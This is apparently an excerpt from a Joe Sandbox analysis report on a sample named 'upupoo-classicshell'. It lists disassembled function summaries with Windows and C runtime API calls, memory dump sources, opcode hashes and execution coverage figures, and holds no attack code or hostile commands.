                                                                                                              • Opcode ID: df4c76b02d548afcb3c0c77d181b4347e642e21d7e60777293d7ddb1a1d3d176
                                                                                                              • Instruction ID: 625dfa77723734badbe6963b8029dbf71b678b19bca523b8492cc54dacefc02f
                                                                                                              • Opcode Fuzzy Hash: df4c76b02d548afcb3c0c77d181b4347e642e21d7e60777293d7ddb1a1d3d176
                                                                                                              • Instruction Fuzzy Hash: 3C318032A1021AABEB15CF68CC41EEF3BA5EB45790B114269FC14D7159EB36DD90CBA0
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,?,?,6E0B186A,00000001,?,?,00000001,?,6E0B199D), ref: 6E0B48DF
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000001,00000000,00000001,?,?,?,6E0B186A,00000001,?,?,00000001,?,6E0B199D), ref: 6E0B4968
                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,6E0B186A,?,?,?,6E0B186A,00000001,?,?,00000001,?,6E0B199D,?,00000001), ref: 6E0B497A
                                                                                                              • __freea.LIBCMT ref: 6E0B4983
                                                                                                                • Part of subcall function 6E0B0F23: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6E0B6A46,00000001,00000000,?,6E0B3B91,00000001,00000004,00000000,00000001,?,?,6E0B0869), ref: 6E0B0F55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 573072132-0
                                                                                                              • Opcode ID: 5886c3c8b138d9306d2626d6179a46040f6ea1c0a07f1d83ac5cdc9a625c14e0
                                                                                                              • Instruction ID: 5f9886c560ff4a05d9be38064fea9fca6f4ccee3849adce6febc1b2a49255d20
                                                                                                              • Opcode Fuzzy Hash: 5886c3c8b138d9306d2626d6179a46040f6ea1c0a07f1d83ac5cdc9a625c14e0
                                                                                                              • Instruction Fuzzy Hash: 0E31B371A1020AABDF258FE9CC94EEE7BA9FF41754F004528ED14D7240E736CA52CB90
                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C2E6FC
                                                                                                              • __isleadbyte_l.LIBCMT ref: 00C2E730
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00C262BE,?,00000000,00000000,?,?,?,00C262BE), ref: 00C2E761
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00C262BE,00000001,00000000,00000000,?,?,?,00C262BE), ref: 00C2E7CF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: ca50fc04415bf42db9f7e1ac18851102d480e63bb888b60434da87157843e1cd
                                                                                                              • Instruction ID: 33a1a8c3a8ec6501d27d38f8ce894ee1cd83b2bc220385422179b8849793464d
                                                                                                              • Opcode Fuzzy Hash: ca50fc04415bf42db9f7e1ac18851102d480e63bb888b60434da87157843e1cd
                                                                                                              • Instruction Fuzzy Hash: 0B31E331A102B9EFDB20DF68E884AAE3BB5FF01311F144569F465AB591D730DE40DB50
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00C216C6
                                                                                                              • FlushInstructionCache.KERNEL32(00000000), ref: 00C216CD
                                                                                                                • Part of subcall function 00C2483E: GetProcessHeap.KERNEL32(00000000,0000000D,?,00C2133E), ref: 00C247BF
                                                                                                                • Part of subcall function 00C2483E: HeapAlloc.KERNEL32(00000000,?,00C2133E), ref: 00C247C6
                                                                                                              • SetLastError.KERNEL32(0000000E), ref: 00C216E7
                                                                                                                • Part of subcall function 00C214B0: RaiseException.KERNEL32(C0000005,00000001,?,?), ref: 00C214C2
                                                                                                                • Part of subcall function 00C214B0: GetCurrentThreadId.KERNEL32 ref: 00C214DC
                                                                                                                • Part of subcall function 00C214B0: EnterCriticalSection.KERNEL32(?), ref: 00C214E9
                                                                                                                • Part of subcall function 00C214B0: LeaveCriticalSection.KERNEL32(?), ref: 00C214F9
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00C20000,?), ref: 00C21763
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalCurrentHeapProcessSection$AllocCacheCreateEnterErrorExceptionFlushInstructionLastLeaveRaiseThreadWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3956295412-0
                                                                                                              • Opcode ID: 9c8428e16da943246a02e084355003deb1c6757f480767fdfad0742a9c7932cf
                                                                                                              • Instruction ID: 8eb6e2fc248ba9508e9dd3ab79a28a5539ad2cb726d3535a59c73e95fa3774d1
                                                                                                              • Opcode Fuzzy Hash: 9c8428e16da943246a02e084355003deb1c6757f480767fdfad0742a9c7932cf
                                                                                                              • Instruction Fuzzy Hash: F82191726143209FD320DF68EC48F6BBBE8EFD9720F098619B44597650D670ED00C7A0
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,100084E3,?,00000001,00000000,?,?,100088BA,00000008,GetCurrentPackageId), ref: 1000856E
                                                                                                              • GetLastError.KERNEL32(?,100084E3,?,00000001,00000000,?,?,100088BA,00000008,GetCurrentPackageId,10010160,GetCurrentPackageId,00000000), ref: 1000857A
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,100084E3,?,00000001,00000000,?,?,100088BA,00000008,GetCurrentPackageId,10010160,GetCurrentPackageId,00000000), ref: 10008588
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: 3147098e497c188db1c0bef3813655e6f48d50d9fb082d9e089ebdc3b860c1d4
                                                                                                              • Instruction ID: ad19a021841b83601cc3559107faeef2263c3a75af5878e4aad8e7fe4077914c
                                                                                                              • Opcode Fuzzy Hash: 3147098e497c188db1c0bef3813655e6f48d50d9fb082d9e089ebdc3b860c1d4
                                                                                                              • Instruction Fuzzy Hash: 4401F732651B36ABF3218B688C84A5637D8FF05BE2B214624FD8AD3149D720DE00C7E0
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,6E0B2E46,?,00000001,00000000,?,?,6E0B3277,00000008,GetCurrentPackageId), ref: 6E0B2ED1
                                                                                                              • GetLastError.KERNEL32(?,6E0B2E46,?,00000001,00000000,?,?,6E0B3277,00000008,GetCurrentPackageId,6E0BE740,6E0BE748,00000000), ref: 6E0B2EDD
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,6E0B2E46,?,00000001,00000000,?,?,6E0B3277,00000008,GetCurrentPackageId,6E0BE740,6E0BE748,00000000), ref: 6E0B2EEB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: 8bf1dd9d78e109f3f3fe177d8388907534114fd78098e7b450b13941a9b317dd
                                                                                                              • Instruction ID: 772cc28be1e44efe0f6ea48b97c9088a12a1489a979b2288500c588978e62ad1
                                                                                                              • Opcode Fuzzy Hash: 8bf1dd9d78e109f3f3fe177d8388907534114fd78098e7b450b13941a9b317dd
                                                                                                              • Instruction Fuzzy Hash: 7201D8326656279FDB2149E98C48B9A3BE8BF077E17500620F915F7145D732D401CAE0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction ID: 8ba0b0d31567f82db08017f06ec0dcb46c8e024582591cea154f109f42e6b5e5
                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction Fuzzy Hash: EF114B3640025AFBCF12AE84EC41CEE3F36BB18350B598415FA2859431D736CAB1BB81
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b5699ec8b926b1eefa472988cf25bd7a939d6487a8a13951325e647237b095f9
                                                                                                              • Instruction ID: ca7e052b1ba0c9c4c3730bec87bbebe04897cc60a9114423253c0b1f866b3849
                                                                                                              • Opcode Fuzzy Hash: b5699ec8b926b1eefa472988cf25bd7a939d6487a8a13951325e647237b095f9
                                                                                                              • Instruction Fuzzy Hash: 56F0E9B6600A4186F606D7B05C4771F73CCCF182D6714C53AB515C626EFA20F9904112
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd62ddbaf80aae36ed7577443f6e8972de364772f40cbdcce04eebe1cf8f76c0
                                                                                                              • Instruction ID: 2bc1ed8948dd11c028fdbd2976b362d9ff0f370919dcc049d9fdb9bef8b76392
                                                                                                              • Opcode Fuzzy Hash: fd62ddbaf80aae36ed7577443f6e8972de364772f40cbdcce04eebe1cf8f76c0
                                                                                                              • Instruction Fuzzy Hash: CCF02EF52082064AB626D7B68882A1F73DCCF242D0B00C03AF50AC6A0EEF26F9548213
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00C27302
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C27319
                                                                                                              • __amsg_exit.LIBCMT ref: 00C27327
                                                                                                              • __lock.LIBCMT ref: 00C27337
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 3521780317-0
                                                                                                              • Opcode ID: 885364bd792298115c90683597f77fbe93a0aa0b03f9a78bd74e4bbc40c8571c
                                                                                                              • Instruction ID: 30e8b810ac944e3e946244e84bc00420081af9aeca41bc74a3739b1f80710302
                                                                                                              • Opcode Fuzzy Hash: 885364bd792298115c90683597f77fbe93a0aa0b03f9a78bd74e4bbc40c8571c
                                                                                                              • Instruction Fuzzy Hash: CEF06D32918730DAD720FBB5A44674D72A0AB04B20F804319B85067EE1CBB09D01BBE1
                                                                                                              APIs
                                                                                                              • DecodePointer.KERNEL32(?,E644DAF2,?,?,?,6E0BA854,000000FF), ref: 6E0B9996
                                                                                                              • _free.LIBCMT ref: 6E0B99EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DecodePointer_free
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 4139015823-1018135373
                                                                                                              • Opcode ID: 86460f81e8f7b33ae7e2392f6e40a3423c929cd43f0efd8617f2920aa2809df5
                                                                                                              • Instruction ID: fc39df1d26d0b7cccb86501ccac950b699f31949c84d9f692d47ddfe3a85bc7e
                                                                                                              • Opcode Fuzzy Hash: 86460f81e8f7b33ae7e2392f6e40a3423c929cd43f0efd8617f2920aa2809df5
                                                                                                              • Instruction Fuzzy Hash: 5E21D1306086069FCB848FADC491B29F7F9FF69354FA0466ED818C7A50DB33E880C691
                                                                                                              APIs
                                                                                                                • Part of subcall function 00C25409: __getptd.LIBCMT ref: 00C2540F
                                                                                                                • Part of subcall function 00C25409: __getptd.LIBCMT ref: 00C2541F
                                                                                                              • __getptd.LIBCMT ref: 00C284FF
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C2850D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 803148776-1018135373
                                                                                                              • Opcode ID: 4521c732f766405099f729543eae05594cdd36b80caffd05d5a59de3f7b837f3
                                                                                                              • Instruction ID: d38ba7914f524ab1586a449f3af0918bbabc1642ee79968242ec54b56ea474a4
                                                                                                              • Opcode Fuzzy Hash: 4521c732f766405099f729543eae05594cdd36b80caffd05d5a59de3f7b837f3
                                                                                                              • Instruction Fuzzy Hash: CC01AD708427348EEF34DF24E4846ADB3B5AF14311F68443DE06056E91CF70DA89EB40
                                                                                                              APIs
                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003AC2
                                                                                                                • Part of subcall function 10003A1A: std::exception::exception.LIBCONCRT ref: 10003A27
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10003AD0
                                                                                                                • Part of subcall function 10005C09: RaiseException.KERNEL32(?,?,10003AB5,?,?,?,?,?,?,?,?,10003AB5,?,100145E8,?), ref: 10005C68
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                              • String ID: Unknown exception
                                                                                                              • API String ID: 1586462112-410509341
                                                                                                              • Opcode ID: 801ff25c5d3337979eb9110eee663fe8bc6d9128113f372e7bce354b8a41f0ce
                                                                                                              • Instruction ID: 147b7ee66f7c361aedf73fb6b590e46a3607ab3a88595bb1c318a0805976edb4
                                                                                                              • Opcode Fuzzy Hash: 801ff25c5d3337979eb9110eee663fe8bc6d9128113f372e7bce354b8a41f0ce
                                                                                                              • Instruction Fuzzy Hash: 46D0A738A00108BBEB00EAA4C801ECE77BCFF051C4F908464B594D705AFB76E50586C2
                                                                                                              APIs
                                                                                                              • __EH_prolog3.LIBCMT ref: 00C24CC8
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00C24CF3
                                                                                                                • Part of subcall function 00C24F9F: RaiseException.KERNEL32(?,?,00C26041,?,?,?,?,?,00C26041,?,00C36020,00C3A010,?,00C22FE3,?), ref: 00C24FE1
                                                                                                              Strings
                                                                                                              • invalid string position, xrefs: 00C24CCD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                              • String ID: invalid string position
                                                                                                              • API String ID: 1961742612-1799206989
                                                                                                              • Opcode ID: a8e25bbc6a21eedc27d10b22e655f90072170f6f950a00dda608b9d11941bb9f
                                                                                                              • Instruction ID: 67fb18237032cc064eebd7249d25bd9b4846e2662191759c125cf3f56e65ba83
                                                                                                              • Opcode Fuzzy Hash: a8e25bbc6a21eedc27d10b22e655f90072170f6f950a00dda608b9d11941bb9f
                                                                                                              • Instruction Fuzzy Hash: 7ED017B2960268ABCF08E7E0DC82ADD7378AF14711F440834E201B6492DFB4A608D761
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?), ref: 6E0AD314
                                                                                                              • GetLastError.KERNEL32 ref: 6E0AD322
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 6E0AD37D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1717984340-0
                                                                                                              • Opcode ID: 61c8805c3120fdea034c5ee5237a0cc5dbc0a8cad38e8810dc12341769bae6a4
                                                                                                              • Instruction ID: 00d3cd85e1d082d230df961fc3694c8227b1bcc784d37afe79c03db486db5e77
                                                                                                              • Opcode Fuzzy Hash: 61c8805c3120fdea034c5ee5237a0cc5dbc0a8cad38e8810dc12341769bae6a4
                                                                                                              • Instruction Fuzzy Hash: 0741FB3260420AAFDB118FEDC8547AE7BF5EF12358F114559EEA8AB196D7718801CF50
                                                                                                              APIs
                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000D,?,00C2133E), ref: 00C247BF
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00C2133E), ref: 00C247C6
                                                                                                                • Part of subcall function 00C246D7: IsProcessorFeaturePresent.KERNEL32(0000000C,00C247AD,?,00C2133E), ref: 00C246D9
                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00C2133E), ref: 00C247E8
                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00C2133E), ref: 00C24815
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocHeapVirtual$FeatureFreePresentProcessProcessor
                                                                                                              • String ID:
                                                                                                              • API String ID: 4058086966-0
                                                                                                              • Opcode ID: f62c64a8d7142726d602158258529398ccb734feebaf50720b334a6159882190
                                                                                                              • Instruction ID: 592746fb457c2eb2b274ef972520c2a937b0ed59d0cefca0f21aafe4ca6860ec
                                                                                                              • Opcode Fuzzy Hash: f62c64a8d7142726d602158258529398ccb734feebaf50720b334a6159882190
                                                                                                              • Instruction Fuzzy Hash: 1B01D431760271E7EB255BB9BC08FAE36A9EB85B42F260024F921D69D0CBB0CD41C660

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:5.2%
                                                                                                              Dynamic/Decrypted Code Coverage:11.1%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:9
                                                                                                              Total number of Limit Nodes:1
